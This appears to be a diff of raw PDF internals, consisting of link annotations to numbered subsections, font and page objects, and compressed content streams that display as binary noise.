+/Rect [108.853 165.491 268.05 176.282] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.11) >> >> endobj 442 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 240.022 186.772 251.975] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 146.715 289.741 157.506] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.12) >> >> endobj 443 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 205.348 191.079 216.139] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 127.939 280.888 138.729] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.13) >> >> endobj 444 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 170.12 243.952 180.925] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 109.162 244.561 119.953] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.8) >> >> endobj 445 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [307.462 127.752 356.295 138.543] -/Subtype/Link/A<> ->> endobj -452 0 obj << -/D [450 0 R /XYZ 72 793.935 null] ->> endobj -34 0 obj << -/D [450 0 R /XYZ 72 693.726 null] ->> endobj -38 0 obj << -/D [450 0 R /XYZ 72 391.275 null] ->> endobj -449 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F14 420 0 R /F24 408 0 R /F22 344 0 R /F20 341 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -456 0 obj << -/Length 1701 -/Filter /FlateDecode ->> -stream -xÚµXß“¢8~÷¯à᪫Q§Î«sFÆq×Yg‘Ù»­¹}ˆ•[7ùñß_‡tPGœÛ—{‘tº¿îþº´´µfi“ÖVž–ÖÑz¶ÖXfg0ТmëᛥÅ0ÿA³LwÐמ*©­æz}x¦Ú¢õ¹u¶Þ_Ûm`<ÛÓ•Ôᘧ«…±ö »fÛè\}–D4ã´m8}G'Y,®å펾k;ý…%0\oÚŽ­íoá‡÷×î^×sLËÕ־hYè@ø®é¸ž-d 6\ÇtÝiŽeñ<âõˆB! X,Ͱû¦ç Bþ#Ý’lïõô„‹§§3šRÂi,gË,¦L.*ç -ʶ\óÕ~Mº#’ÀÖ˜`ÒÒ*Á Í(#©”¾+—iI {_`áÑ> - -î…ðw{] ¶Šõ^é¶ÝG·aP(èËjúmX—”e„ŹÁé8¦gcpÆd ¡]Ž£Lùœ˜'aöo«kÙ–Õ3àg/!ìV™9oöI–Ô&.iš–Q”¼aÀºM™Öcºt×2= ¼‹4¹çdMÔ{‚:OëKå$FJæU»Jä#ʳU².!ð ‹núiŠòIJe¿@"Ö|@””gk>l$!\ HvL¾’Ÿð®¢ã‹”ß—o^ƒÎhTOC™×Ì5cK¡eÇÃ[?¼™ÛÐÔÁÖMÞÉ}rõ¦Íyq7_„gêzâ’ð°¸aL -2ÂQÛp{ { ïÒ -/X’­Ýª ”fu)²¼„#}£ÑL”çß:¼šÏ?NýﮪUl -¢åq9Tä*EŒ®(£lø×~àUª -äºê«'ŠjDff@«ÍŠáhâ‚øu,wp é^ŒÖèé›Ê¾÷ ?¨t-$÷+hŠû5É´uÉ{÷¿­©:'ì«"8ñHnáÃ4öƒÚ÷Ÿ †–÷ÖPT‚ÈèSšdufwÐ`Äí¬Ñ)‹Q¼ìèp~½óOÂ?‚uð!‰D gûZ€{‚>’´Ä×K“è˜Ìãd-(À‹ó¤­PDŒÆÃÑUà -E$Z+Å4Iy#˜ î';ÂùSÎb?® Ï/û`þ×Wlq÷ª¹×™­d϶ŒýáWœéÍuu9äÃð&€t«dß’çd[nO/+ò(ŸAYT2VÓl“ÉþyˆÀù+«.BSò2û³‘ŠÇXÌÈ}I† …‚õ˜«NR> >> endobj 446 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [257.923 718.914 374.8 729.705] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 71.61 189.78 82.401] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.9) >> +>> endobj +451 0 obj << +/D [449 0 R /XYZ 72 793.935 null] +>> endobj +448 0 obj << +/Font << /F21 408 0 R /F15 404 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +481 0 obj << +/Length 1883 +/Filter /FlateDecode +>> +stream +xÚíZIwÔ8¾÷¯ðmÜïÑÆ¶ämn@yÚ0µ­t<ñÒÈ2!ÿ~J®²Ó‹CB“ s±eíþªT‹ª\ka¹Ö³É§‰o×ò¬È·¢Äu¼$±Òrrôѵ2¨ÿËržÄÖY׫´xû°&o&'÷}ÏJœ$ôCëðç`NÂë0³ŽlÏ™Îâ„ÛÏ«)óm­êé ÞY›ê¼®¦ÿz¸ï+ãyÈׇºÑÌô˜¸´SÜ¥ZÐvß>›X3îŽyP`ç  œÄñ¦3ÏãÜ~+Ek2f |}p/¤)sûXÕ%ÖꉅLh1 }5R}žú‘-ÕÍæph=o´,×öhÍ‚„Ùð×ë~Û‹'ÉNã®~mlÐó¼ÄùUغÖÌ‹( +/@õ Ô÷Ó˜Ù*×r ÙˆëÇv*Šm¨€Ø«8óQœãQœùe8Þ÷@s#p"^ɵ¾ï$n²‰¯ç´¾o¿Zv8J%t^-ÖX áNSÙ4[p°ø–Øçöô6Ö%Mti.£Œ‘'!pþÓ/2m¾Wó\+¡Î‘MkC·h•n|ni]–¢Ê6wÆbþKÓh7 Ý }Äð5HÝ¥FLŽk…@ u«gõñln€BÎ?‘EñË/¤–j©Ì“zÓè^>ÙÜgìz?Ö1Ì"v]Ì¢Ìböª"žK‹<5’ò|¹%[Ŷ=›zv}Ü—æ¦  P™ÂÈå8Èl äÀó~ dvâ:Žî­+]+™ v7•Y«H倚”–À‡É|Qïy ª‰ ØZê‚ú 6Ö¶É/Ë¢ÎõfœÝ®à….ÙU)y¨”ÞçUÖýìYƒ8(¹È•¦c1—©¦Ð‹ï‚Æøaë(övTM^¯š6,]¾I2Ö‘¬Ñ=­N;Ö>>OƒÐE+·´SèßðwCÝœôظúhÁ1] +*•“ý¾Å— ÿ}Ì(¯ó]';ÿ]ö c6õ¢çð¬V§$ú‹¯¦5¥JºÙŒ›5¤ÓÜ“ž’K± éº#Ò–Æ'›Óíø–²Ž~Qý|»ßê÷fü;Ä„láø©(ÅrËPwãÿUèM“c•ßɲ?èudÔëÈzi"ÐtƒWkg©¹0¯ C/ZÌé5Áó—Ïׂ“ÛäžwgÉ7Šx¸ âdÚ?2€§¤s 7˜bUW³§T"ÕùªáR¢4ÊF ~W‡6Þ…1áI!Jàeï5$ïSö¿8ÀÒ¼s¦(biÐkIŸ½€‡ªNƧXÿnoÿƒ¸ <¼5«óB^4þ¸8õ¹F –«¢ Ù,391«Ü€‰y)‰Ø{à=L– …ƃРxا° KŽä®POœÈáìZ}R«æ«S'.&Ðø0#wýnÏôÜuhÒ.P1Y8eáx_ÉÂq»=…G“ê‚ù;oðmBŒæ]{ÐgS·*•Xî[À» jjµl0:Þ}õQÐç‰Ð4}«kcÒjÛvóẦk;sÑ´dRËôböŽ!Mq¦þµ;0Ì }Ê:xó7ÀÄ þ•)Iû 1B>Ãå´#ƒC‹§à‡Êî&š€TsŒ½æµ3‰ãâÕœh¿Èyi Ó{>ר/­KÙ`§³\ŸÐêøê·ª4¥Ugj­¬{,…n•lÆþµ„> ÃÞŠ ƒÕA½9å0«Z*Ô0ÂĆ#¾îÄÎäFšé¤î~øddLû¡îf%šÏ0€iǸá0ºvk C+TçCû…þ~0&^]Í“éÝ`ù¥_ ïtegPFF3š£ÄæOÄáöç\\’´ÖU…¼Ô8tH¹åyN>0Æ$îÏ'¦«Á¹+?µ¹’¥Ä“Ú\r8ÇwãõÓÉžÎ.¹Š¼ù¢ÿƒŒÚ«Ë„ÑQ7îõ9Hj+#àd eç•(óëj`É °ÍÙ™Õ*'¯xeIÔõ]FUÂ^(Q–CšLlÜ‚Ó`„8íÃü“À.^Žr3*‰P> T0²„%æ0g’òq T™Sª±3q%ôÆoêа¡Ex2aD]çØ¬PÍÆL„ maõ×VöGÅ Œ€yí¹Vê ßO'ÿ•çþu +endstream +endobj +480 0 obj << +/Type /Page +/Contents 481 0 R +/Resources 479 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 410 0 R +/Annots [ 447 0 R 452 0 R 453 0 R 454 0 R 455 0 R 456 0 R 457 0 R 458 0 R 459 0 R 460 0 R 461 0 R 462 0 R 463 0 R 464 0 R 465 0 R 466 0 R 467 0 R 468 0 R 469 0 R 470 0 R 471 0 R 472 0 R 473 0 R 474 0 R 475 0 R 476 0 R 477 0 R ] >> endobj 447 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [498.693 718.914 540.996 729.705] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 747.553 356.253 758.344] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.9.1) >> +>> endobj +452 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 728.777 372.162 739.568] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.9.2) >> +>> endobj +453 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 710.001 217.336 720.792] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.10) >> +>> endobj +454 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 691.225 342.835 702.016] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.10.1) >> +>> endobj +455 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 672.449 377.419 683.239] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.10.2) >> +>> endobj +456 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 653.672 419.058 664.463] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.10.3) >> +>> endobj +457 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 634.896 410.979 645.687] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.10.4) >> >> endobj 458 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 704.732 132.965 716.684] -/Subtype/Link/A<> ->> endobj -448 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [207.887 704.732 279.878 716.684] -/Subtype/Link/A<> ->> endobj -457 0 obj << -/D [455 0 R /XYZ 72 793.935 null] ->> endobj -42 0 obj << -/D [455 0 R /XYZ 72 760.449 null] ->> endobj -46 0 obj << -/D [455 0 R /XYZ 72 690.718 null] ->> endobj -454 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F20 341 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -461 0 obj << -/Length 1574 -/Filter /FlateDecode ->> -stream -xÚ½XKs›H¾ëWp”«hô`«tˆm)«”_‘PU¶²9Œ`d±‹3`[ÿ>=3=’ãÚÊ^$=ÝßtýzÆ£Ñ3>wž:6ü÷ Û9ÆÈíY¶ëþ®óýGÏàù£gwl¼H©A†cøŒeçkçÒë|œ9¶áZîÐÞFéè[n`xñ½;°.̱Kº+NÙÅïËÇ™=¨È“aßê9 PJ»B¢ÓCd zhŒAtH„¨Il×rÆ.\ô-B\µÄ4>¹_^˜Ã±ÓïÎ’ÌgæÀt×Ôÿ×dq î®/o—âŠt“”e4ãGõ‚ïyÎvê:Oð{awC®nžiTHä€É´ðE_[N3¶ _'‹élþíÂt† ~ÿÃü¢ƒ_¶,ÖþbjƒOËö(p_´ÉØ#{M'‹éçé·²Ïþg ìÕ„[&Sí»GÜV§¬Ñ¦XR »f›$Ã7~²Kéa¡†IàEœ³8çg0€G&Sí‰á–æþ–ñ³ À9~ñ^¦kÛ1L‡Xîx¤ÀxÌ߯!¸ÿ!eP¤Š×Lh'I'9ê¦qbÁYÐH.Æs% X‘­)óÃMè«»å×é -á ,DXmÔª´•‚ãn“XãÜ”i¤;.JB…téfÖ5zp%ݱœe÷=?¶‡R²eÚövß‚­àiíÛPˆ[åè¯(Ô¥êÍý[Úˆ Úð×PñX`*÷m`‡¾h_“.J©§"MBÍ.±³ -ÓAÊšB¡< -ºè=Ãã"M“,¯m•hy¸cŒÀžwn!¢ktIҤͭ)#MqæO¼ùít9½ÒiË€áA#eÑ}£Hèž0èfŒ§Àavp„ˆ‡trï­ŠàéýBçlÛïên~wpøþ`%Œ×4lúÕk«þv²ò¦WâÎËÄmϸ - Ú!5Ì‹&xÌ2æ•η’áÿi×5üË3…=«Ôw‰e;¤Ž¨4[£tR§En©û;Ô³fUzL°’KÊÊh÷úÖ ?¬×Ƥ2ËR¨«ùÉâhn>(¥¦¹9ˆc`D+®–ì*²È¶ð™Õçè[,ã¥KúÄÆŽ+8ƒi\ì䔓Ŀ£„3TX£®Õ§®€æTäx‡v4†–$JKs#@á#‰ÿC9Ð~^èæFu­t¿‹sÆkX Z¬®ˆq¤Å-4Íä™anì5J£öDVà¼ÂœN^âyyY)ëõ‰c®KRûcaLÖ‹;Ž<Ž<ʵæŸ_dؘa±—šŽÔ@@•hÌ74ë*2ÔW-–5}ç"lš!uŸ¡ãŽ»×Ð>}\n¼9·6Æ]_~:Q‘@”ã1@óÿÈ¥RŸÝ=1ƒ¥”ó—$½C5©ÄOiâz6PËþ-åÛjK…äÂÀ¯ŽÚ9œ$Âç0‚Ù—£ók; 'ìV ¡·¬•û Ö°b4t)ãzÂS*}0°'½]’Cu\sì˜ëÓPý$*v²4FýwYÒUA¯G«{B«ž>þŒ ØÁ¡dÔ'@cyÙbˆBuE­ .×g,D@Á‡²þjºH\ÇbÒ(’JªxðY›_øq4®6×ZÒ¤©P¤kï ¬•àžò.o´ßÝyÍꕺº‡fEŠ3=­ÍÐ -ÇšåtU¦QV*êÈ M<¹™Ðôd2:=‘óxœkÄP4Fj×ÒêáW›ݤ> endobj -462 0 obj << -/D [460 0 R /XYZ 72 793.935 null] +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 616.12 216.534 626.911] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.11) >> >> endobj 459 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 597.344 296.575 608.135] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.1) >> >> endobj -465 0 obj << -/Length 2106 -/Filter /FlateDecode ->> -stream -xÚµX[s›È~÷¯ ¶NÕ¢ª€®Jr|I¼_Ö’7YשYs ’õïO73BFJâÍy° =Ý_ß{°´'ÍÒ>};²áii¶æ;šZ¦†Z”}}´´9ìÿ¡Y¦Úº¡J5wÀ3Ñ&G}˜_:¶šáØkÓ…àAÌxÚt®}Õ=sd¡«?púÄFÓ?Ž/mo‹ÞõÓraCm[HrdIhÀ{¬@;v‘Öpm×$V bºn(ÎFÉèÜXÄ {yõùbdØžïê÷°;2<ÇÓ©x …\•yŠ+W¯–rkF£gƒeòÄù‡ëIÿ«ó ¯XŠø›a;`¢¬Ë¸b ÁrCý n÷0$yD“]Îy&v¾ÆÝÒà˜9ã•Àr¾eŽ{¤3ž'u5²uÖá*hµ”˜rñ\wªÀÊ5BÓµÍp\3 ÆBømÁJZÅÙSeƒFãü¤9*OnÞ.c.åE+‹DpÉõLН9›÷± Ö:§Q.ߥ4CÆO,eY5dÄ8ÈËæ¬L6R)ðÖŽ¦âÒXÃW®È¹¥ó÷·“³ëó‘Alˆ‰‹ÕmTdxJä)À»øó%KšˆÞw „vQIOæå¶O³ -äDU¼bß•+øî“Z¬åØ ýîÀ¼®Œ@-ŒU®h¿“Ž`¨(ñ¿<€ˆå_7gû•Ng%Kèl:†Ø¾Í¤=£$Žž…jÅ!\··dRóHfùBbR奊L±y]ªX¬ ÁL¾bå"É×â {)’<®hòƒ2Š2^ŒGÒÅ` ®â;ɇC]¡]âÌ62ëf5oÝû%Îæùšï& &Ò3æÆ{\!å +ÂûëÉåÝéô“¬nŸ»ZÖÕ‹õ’)­¯Y…YÆ ÅÖeIS¶ÎËgñ“Ȱ”0bLv^Ñ$a{â½J dz}·…䞥y›R¢ž±>0°ûBêÊÒ"/i¹éª?KÅfo…»Žy!C3–×û«™a î†øD?ÁtÓ‹DWg4Z¶9RÔÕN€§´ñU-Nå ¥-Á÷tO‚ÖÔ;&ãòAþhrï[’Ò¢_=Á@mí‡É’*¦j7³|_„JëM.&“«ÛÑqšJ7¡«¶ÌI=JÆk¥ M’®6‹ä^³⑉¤âYpÙ6Æ›n8°¼‘ì7Ø!ú -ßæë*¾Qž-⧺ÜÊ «›+%ðìHj-=£úq8D¿a+•˜”?ïTžz;oã <þ®mg;¾Ÿ³æMTªñ-é*ÎërB”0šÕèT¢í IÎÅã®éÏš¼`Q¼ˆ#ñëáüRòRõ\ -.9ÇÕlÛ =ÏÓ1}bkÁtiÇ?rÔÆ’+ÜøN#âèh @°è9‡ -AdÞíLˆØT=Ó±B5b N$g‹øæØñÕ(i¬x’ưÓ÷eJÿ5 - $ŽHÀXNàváâÀÛmŠ $ -t&~ˆI‰1—p‡³J,›ã›ÕéKq®QžA”0ñ6‘b[\§ð08s˜¢] ŠêŠoØKÌ+qc„¾ˆuËsëˆ8€a…1¥‚ˆ€%¤M·€ÛÇz,¬»=ØÇ$PÕ >`ÜÀ ‚@Ä™àµ^B8]—’u‘6iñOK_ã[*Ú>„Y,>Î0ap!éXYæ%\šzBì@¯`ša0é!úg.)ã…|¹dAßxG¢ºTBã$DÂëLüàË9­3´×ÚeÀ¡czp‘ú:{ Ò(ޢǮë˜~Ó6¶ü@ž£d¬³úI,Utwl _!b(J°lÇ6 Í2˶Lkl¿ÆÕHë |šNïĪdßjh ’bcK´É.é.]¬””œeȺ’^lÑﱨX&±‰æ¾ º0.ÁwvŒ+@B° "3ŽÍ÷Zà„¸2¾9×ö\Óq=Æ€ÂÕÖ@ÛÈh B+ðÞܬ I5æD«úz%®†=&¦:ý’vñBÓ"‘ç°£á“(‡Ý°ÍêëÍäÏÏ@ ÕÂ3-sìèäCIïê@EË'¬yÈÿoË³ÚØTŽ)©Xõ|¬zß³iˆ)CÛš$Ú'½/ûž»_°&øÌ±%{é¿ä̸©–j -à JÓ ÍBöK£Ïß–UUœÛPìq`ÚÐélݱEC=N7°8ãün]f±,þÏßÛ¿I&+1~ؽk£tÞ×åò$MOlçQ½ºΗ·j€åÝ b"ƒ¡µZÄP·u Vj‚rp^üyñbg¦@žD5Ä‹±Q7kª&õ g»µæý|ðΡ ¹Ã¤PoGè!åÜŸPî5ãô ¿ ˆ«$ÅkK{-ü½{ÿû6 WŸo2šB¿û_NÇýÍÕÍÇÇ!©^_ª»Wª§g¹V4S{Ãþa¾!ÞÚKè6Ï^Ä @šN»7ˆV­aÓî–q©¾¿üzÅÅ<óóL`Ü-7'b}v{sv:ÅÙæìÓé=>=‚sÇ;aÁþ&þ½!ÿäw6—2=op¨¹˜ý¢˜Ö -endstream -endobj -464 0 obj << -/Type /Page -/Contents 465 0 R -/Resources 463 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 453 0 R +460 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 578.568 321.365 589.358] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.2) >> >> endobj -466 0 obj << -/D [464 0 R /XYZ 72 793.935 null] +461 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 559.791 301.832 570.582] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.3) >> >> endobj -50 0 obj << -/D [464 0 R /XYZ 72 447.215 null] +462 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 541.015 236.952 551.806] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.4) >> >> endobj 463 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R /F24 408 0 R /F22 344 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 522.239 262.683 533.03] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.5) >> >> endobj -469 0 obj << -/Length 1376 -/Filter /FlateDecode ->> -stream -xÚåXkoÛ6ýî_!êt­§-yè'uy´‰‚ È‚‚–i›­^‘è$ޯߥHÉ–-§ŽÛnÀö!¡H_Þsxïå!%M™*šrÒ¸oèÐjŠ®t ¥ëjHw]Å·wš2†ñ÷І,×Qs«P±:´rÝøØ8ôícCW\ävŒŽâM„¹¦­xcå¶i£Õq­æM†§äàÎ{ß>Öí{ËvfÃÜZ×¹IC“ÔÀwGqÀ¶cq[Õ2M¤›&@–åŠ9·³Y/ {ºuw Ú†Ý¼^èÍKÙMH:‰ÓŒE×ÐD{?')%ïXM‰Aù[Fü8gœ -ÐPuÖoîó&4 i4ýóÅõdz=üpv‹žx>\œx§j¶vtÚ¿â­mÂÿíá:% þ@ÆÒý>>Öbª›?2¦«±¸œ Ž<ñl‹æøêŒÏE‡Fœf4Ž>eþŒ„yýóÁµ åðl‡ÒÖÚ?ëQ´+>¬!ŠdTؤ$ÓcÀ€hå˜-2F¢®h47# 5Ø\t¤K<^mÈ¥$¡’åpDž¶U^I'I@ý< ‚#þ,ŠƒxZ$òÃé8d NKXõ 9“ûÆÝ:ö¿¨$’tÞž_÷Äl±×òÑ_ßÎ5¤ÕˆŽjXÈÕºÐ:¨kJ<á0 Þ4Í&'Î[,fW$®âãv -É’°¦cæpn ^×FºSÎ`8&üó?Ý& @Òô&„ºqF^³€€‘Ó$A ×AŽcÎxunaÀ“׫¨ì¶v]} ÝA¦cÃCu4™ŽŸd-/Ø,–µšÁRîƒ'(YˆUÖ«cI¯ÝÖ]é(3¤`¬·³Ü¾.à¡ ÁùD#†’Yò¿Õ_I'"ÏFQ<‰ÕÕ­¦™ÅV{78Ï7'w…0PFq@ÿ*÷+*-×ì)ß©¨Øíj°û/Qüð쎧rd„3òŒ\lñ‚£`ž¬ÒϹƒq‘ƒ§8$Œ¤Ù>ËÉc›+9õ<¹iC0&p¹ Y,Ú“·šŸ’Z¢¤¤0cY)e‘5»>ŸíƒqÉJ¨?ÎÏj$wB²“몚3 Zz†¤DÀé²–±,4 Ïd|+¬åŠûH&SÊð( òÄ{ÄTbcÑLxBw=©µ-šµ×@Ÿ«uë‹»“MíOIÄÄÒÊ?¿^þþz•†Õ/"R§ýÞ¿Ë¢bª¨vÕÚŠj7£XÎx üa໬dÆ«! ã5ûc¯_eÙ ³ -Í|GôÊ"k0¬ï€Q‰.<…”^î\«Ô¯z¤lV¹¬%TÅŒd4ûVvóˆd>NŠ«b4A°Àدál×rã Ú/ß—ëE±É‹ IJwâU_@?²VjÃXáÊÃÄ%KÈäK3Šºû]7ÍÿüuÓ¬½n™ÞRª¶õÏ^–xÞUðއGbàòÆ»Ûr±êÕ @¹™V‚”x#NK¯ml¹¾ï“„©þ .]„É×´áõ¥ê8¶«êvkÎ&ªóËý[ u[oD[çç4ÎXñµ¢H%p‚lê=G{9ÀÑtާDB“Hg-åHööy½"YO¬ýÄ-h­¼ÑÂÐZÆÂàgËV>‰ä ®è'¦ÕiÕÁÒH¶“hÚzÓ~³]~ÕÀüªÑ[Zp€,ñÈ•oì²ìEQÏSŸLb¨%Öaïï2÷GeAöŠ7ŽfdäY±ÛV’ö[àkßǶ9Yý&ttyqÔ÷*ßÇ,¾BùQ¡:X,}C}^ão•† -endstream -endobj -468 0 obj << -/Type /Page -/Contents 469 0 R -/Resources 467 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 453 0 R +464 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 503.463 285.37 514.253] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.6) >> >> endobj -470 0 obj << -/D [468 0 R /XYZ 72 793.935 null] +465 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 484.687 285.093 495.477] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.11.7) >> +>> endobj +466 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 467.847 170.44 476.701] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.12) >> >> endobj 467 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 449.071 346.376 457.925] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.12.1) >> >> endobj -473 0 obj << -/Length 1041 -/Filter /FlateDecode ->> -stream -xÚíVÿo›8ÿ=šV‰tÁ؃ɩ:eý¾[›¬¥ÒI½êĨ" `Úæ¿¿g ÙÒÒ^µéN§Û‰g^>~Ÿç÷ ccn`ãpp; ±A Ÿ~€ #^.¯°q úFnÀûµ4\ƒLóÁ§Áûp`Pb(ð¨g„7Ú†ƒ‡áµqi24´xàšU4ëðƒ}@ØWx—q„]0Ø  Un]ÛžÁë¹ -k¹Žƒˆã¨rÝ@ï¹L’ñr9fìjh1ÊÌËðl2$æÁÁñ®VL/Âö¯£0œéU)nkQɱ¢*‹P8££ î‡dW·é2*ì媃·©=òÏE&Q‘¿.®wÈÅ“Ó=xNÏàÉOŽá HëÝééî$T‹£ÉænÑ`‹îXiúx¿ ‚ Æ0Ñ»H§Æ[Î><=gÍNv¹ÓÈõAm‚HÍ$ŽE!­8‰ÊJ@`ƒkŸO-ÎY`6ªåŹÝÁÈmkÙgç(¯ônf’€"âqà#&"”Œ9~9²y ÕÐR‹Ìª«‘È&öü¾–KŠi?,)EE‘.âH.ò TÞ¹Lߣf“R4$~/Òh¡YùhƒÖÕ´‹%8iÙ|´mo?ïÝE%J Yç!T pªÂQ‘kT`†)‹±ÝÖªòºŒÅM^Ît&$`zóµ›g™ˆÕ™ZûqšÃŽJô/BW=mfQØɑﴳÿ-‹T -ÇqÌ<Ó2Ò»7šÚƒv ¼®IOVçŸ>˜;ÐÝy~ŸÏáë2‚cJm_…ânH}SÀ!Ê¡EÌÏC ^ój!•z¥a©7EÚãNÀçNgÜí¡gȧ~PoÌ•çäãyC Gg°ð‘‡Û¿ÕY(V2Q1k2ÞŒ•Öb¥5V­å›6ëëö0ùj´ôÌ•7­‘;Ý!n—i•Dˆêf¦Ÿ”€ž‡®ÛÍÃãÓ œ^uýSÉE6oKi][ퟹf”‰hmæÔº.Ó¾6yÂ÷ïÍߟÃîû‡óºaçþG†ÝF ü]åŸö^UäY%t:”«ÓßÚnÓ‚b¼½Û‹¤hý -“z¤m¶ ÷D¼¶ÀõªóO¿‚o'aŸÝsQÞ‰²µ<)¢86€)¢(øÓ‹Ïu&ë&rnv4³@<‹Öê/ØQ·T÷ ™èÕyÀdͬY$ã¤ûwk–ß‹R\[ïW­3°ôÈvíöUdKB)XE6—ɸ‹GðÝŸ±Îp¸*º€«ãu…ýâ—ï¹yÈ^1õ§í#^¿fe=}óS S=%UIkËeSù\<áûæ¡êþ“—ZúªK-ý–K­?u©mäÏ9ÿ£ÍùüRËþ÷—ZÖëü~8ø h> >> endobj -474 0 obj << -/D [472 0 R /XYZ 72 793.935 null] +469 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 411.518 252.529 420.372] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.12.3) >> +>> endobj +470 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 390.806 369.99 401.596] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.12.4) >> >> endobj 471 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 372.029 208.898 382.82] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.12.5) >> >> endobj -477 0 obj << -/Length 917 -/Filter /FlateDecode ->> -stream -xÚíWoÓ<þ¿Ÿ"BšÔƉó«NéŠJ·nåekY3 iL(M½&R~5qØúíßsœtÀëÁô -!$øÇgŸŸ{îì»ø]Ù(ºrÖÙv0H]ÁJßPú®Ž°ë*AÒ¹¹Õ•5èß*:²\¢ÜרD±2V–÷7^G›Xq‘ëŽâÝ ¹¦­xkå¦k£C•¸V÷ºô7ôðÖ{«M±ýÞ² Ò- ¬ÑØäŽÞ„ÜŽBëX«Z¦‰°iò ²,WØÜ „n¹˜¨Ø€XÍf# I2ÀýÛCÕ6ìîÍìrzˆ»ófÉhÉ¢t#A–¦4`Q–6›—V—…´QøÅ†21¯ŠøYþ¼«1ø›Ng¡˜_{ÍÖ¹ç-Ĭ Û -ÈÏN=ÒÊmœø¹–ìJ ÜÆ„ò)JÊÃüu´>ƬFXÆ5š35ý¢¤à®>Ýl9W ±]Û½ŠÝ©äÕöXGýÞ‘2žó¬Öv»Â¸‹°DÿŽçØO7Ô@㚦jUöhZ{²¿²³¾´´Éz`ÚCžâžŸçqøy–øÍÕªº­‡Œå­I *³ªè]µ„Ri¾&û‚løƒ8‹’¶`ÃB.qžYy³KIá•y––T¤ƒ‡:ÿGì¨BºÎƒ“Væ‰Ïh—V=Á›2<¡ÁžˆYŸXAlž,çKZ|¦EÃ<Îý ¤€ d 